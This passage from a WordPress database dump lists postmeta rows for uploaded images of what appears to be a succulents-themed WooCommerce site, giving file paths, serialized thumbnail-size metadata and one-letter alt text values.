amera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(492,4188,'_wp_attachment_image_alt','a'),(493,2139,'_wp_attached_file','2018/02/blog-recipe-4.jpg'),(494,2139,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:25:\"2018/02/blog-recipe-4.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"blog-recipe-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"blog-recipe-4-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"blog-recipe-4-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"blog-recipe-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"blog-recipe-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(495,4188,'_wp_attachment_image_alt','a'),(496,4189,'_wp_attached_file','2018/03/landing-what-we-offer-1.jpg'),(497,4189,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:530;s:6:\"height\";i:306;s:4:\"file\";s:35:\"2018/03/landing-what-we-offer-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-what-we-offer-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-what-we-offer-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-what-we-offer-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-what-we-offer-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"landing-what-we-offer-1-530x300.jpg\";s:5:\"width\";i:530;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-what-we-offer-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-what-we-offer-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-what-we-offer-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(498,4190,'_wp_attached_file','2018/03/landing-what-we-offer-1-1.jpg'),(499,4190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:530;s:6:\"height\";i:306;s:4:\"file\";s:37:\"2018/03/landing-what-we-offer-1-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"landing-what-we-offer-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-what-we-offer-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"landing-what-we-offer-1-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-what-we-offer-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:37:\"landing-what-we-offer-1-1-530x300.jpg\";s:5:\"width\";i:530;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"landing-what-we-offer-1-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"landing-what-we-offer-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-what-we-offer-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(500,2975,'_wp_attachment_image_alt','a'),(501,2981,'_wp_attachment_image_alt','h'),(502,2988,'_wp_attachment_image_alt','a'),(503,2992,'_wp_attachment_image_alt','a'),(504,3007,'_wp_attachment_image_alt','o'),(505,3061,'_wp_attachment_image_alt','a'),(506,3112,'_wp_attachment_image_alt','o'),(507,3113,'_wp_attachment_image_alt','o'),(508,3115,'_wp_attachment_image_alt','o'),(509,3116,'_wp_attachment_image_alt','o'),(510,3186,'_wp_attachment_image_alt','a'),(511,3187,'_wp_attachment_image_alt','a'),(512,3188,'_wp_attachment_image_alt','a'),(513,3189,'_wp_attachment_image_alt','a'),(514,3222,'_wp_attachment_image_alt','o'),(515,3223,'_wp_attachment_image_alt',''),(516,3224,'_wp_attachment_image_alt',''),(517,3227,'_wp_attachment_image_alt','o'),(518,611,'_wp_attachment_image_alt','o'),(519,631,'_wp_attachment_image_alt','o'),(520,1079,'_wp_attachment_image_alt','o'),(521,642,'_wp_attachment_image_alt','o'),(522,643,'_wp_attachment_image_alt','o'),(523,18,'_wp_attachment_image_alt','o'),(524,1081,'_wp_attachment_image_alt','o'),(525,644,'_wp_attachment_image_alt','o'),(526,52,'_wp_attachment_image_alt','o'),(527,645,'_wp_attachment_image_alt','a'),(528,73,'_wp_attachment_image_alt','o'),(529,1082,'_wp_attachment_image_alt','o'),(530,670,'_wp_attachment_image_alt','a'),(531,88,'_wp_attachment_image_alt','o'),(532,708,'_wp_attachment_image_alt','o'),(533,1083,'_wp_attachment_image_alt','o'),(534,91,'_wp_attachment_image_alt','o'),(535,709,'_wp_attachment_image_alt','o'),(536,1084,'_wp_attachment_image_alt','o'),(537,112,'_wp_attachment_image_alt','f'),(538,710,'_wp_attachment_image_alt','o'),(539,1120,'_wp_attachment_image_alt','a'),(540,712,'_wp_attachment_image_alt','o'),(541,1121,'_wp_attachment_image_alt','a'),(542,1122,'_wp_attachment_image_alt','a'),(543,713,'_wp_attachment_image_alt','o'),(544,724,'_wp_attachment_image_alt','a'),(545,754,'_wp_attachment_image_alt','a'),(546,91,'_wp_attachment_image_alt','o'),(547,1124,'_wp_attachment_image_alt','a'),(548,112,'_wp_attachment_image_alt','f'),(549,1125,'_wp_attachment_image_alt','a'),(550,1126,'_wp_attachment_image_alt',''),(551,1128,'_wp_attachment_image_alt','a'),(552,1129,'_wp_attachment_image_alt','a'),(553,1130,'_wp_attachment_image_alt','a'),(554,1132,'_wp_attachment_image_alt','a'),(555,1133,'_wp_attachment_image_alt','a'),(556,1134,'_wp_attachment_image_alt','a'),(557,1143,'_wp_attachment_image_alt','o'),(558,1148,'_wp_attachment_image_alt','o'),(559,1151,'_wp_attachment_image_alt','a'),(560,112,'_wp_attachment_image_alt','f'),(561,3229,'_wp_attached_file','2018/02/h3-slide1-graphic2.png'),(562,3229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1021;s:6:\"height\";i:312;s:4:\"file\";s:30:\"2018/02/h3-slide1-graphic2.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-600x183.png\";s:5:\"width\";i:600;s:6:\"height\";i:183;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"h3-slide1-graphic2-300x92.png\";s:5:\"width\";i:300;s:6:\"height\";i:92;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-768x235.png\";s:5:\"width\";i:768;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-550x312.png\";s:5:\"width\";i:550;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-550x312.png\";s:5:\"width\";i:550;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-600x183.png\";s:5:\"width\";i:600;s:6:\"height\";i:183;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(563,4190,'_wp_attachment_image_alt','a'),(564,124,'_wp_attached_file','2018/01/tabs-background-1.jpg'),(565,124,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:725;s:4:\"file\";s:29:\"2018/01/tabs-background-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"tabs-background-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-600x227.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-300x113.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"tabs-background-1-1024x387.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:387;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-768x290.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:290;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"tabs-background-1-1536x580.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"tabs-background-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-550x725.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"tabs-background-1-1100x725.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"tabs-background-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-600x227.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"tabs-background-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(566,4191,'_wp_attached_file','2018/01/tabs-background-2.jpg'),(567,4191,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:725;s:4:\"file\";s:29:\"2018/01/tabs-background-2.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"tabs-background-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-600x227.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-300x113.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"tabs-background-2-1024x387.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:387;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-768x290.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:290;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"tabs-background-2-1536x580.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"tabs-background-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-550x725.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"tabs-background-2-1100x725.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"tabs-background-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-600x227.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"tabs-background-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(568,4192,'_wp_attached_file','2018/01/tabs-background.jpg'),(569,4192,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:725;s:4:\"file\";s:27:\"2018/01/tabs-background.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"tabs-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"tabs-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"tabs-background-600x227.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:227;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"tabs-background-300x113.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"tabs-background-1024x387.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:387;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"tabs-background-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"tabs-background-768x290.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:290;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"tabs-background-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"tabs-background-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"tabs-background-1536x580.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"tabs-background-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"tabs-background-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"tabs-background-550x725.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"tabs-background-1100x725.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:725;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(570,1152,'_wp_attached_file','2018/01/product1-gallery2.jpg'),(571,1152,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product1-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product1-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product1-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product1-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product1-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product1-gallery2-600x300.jp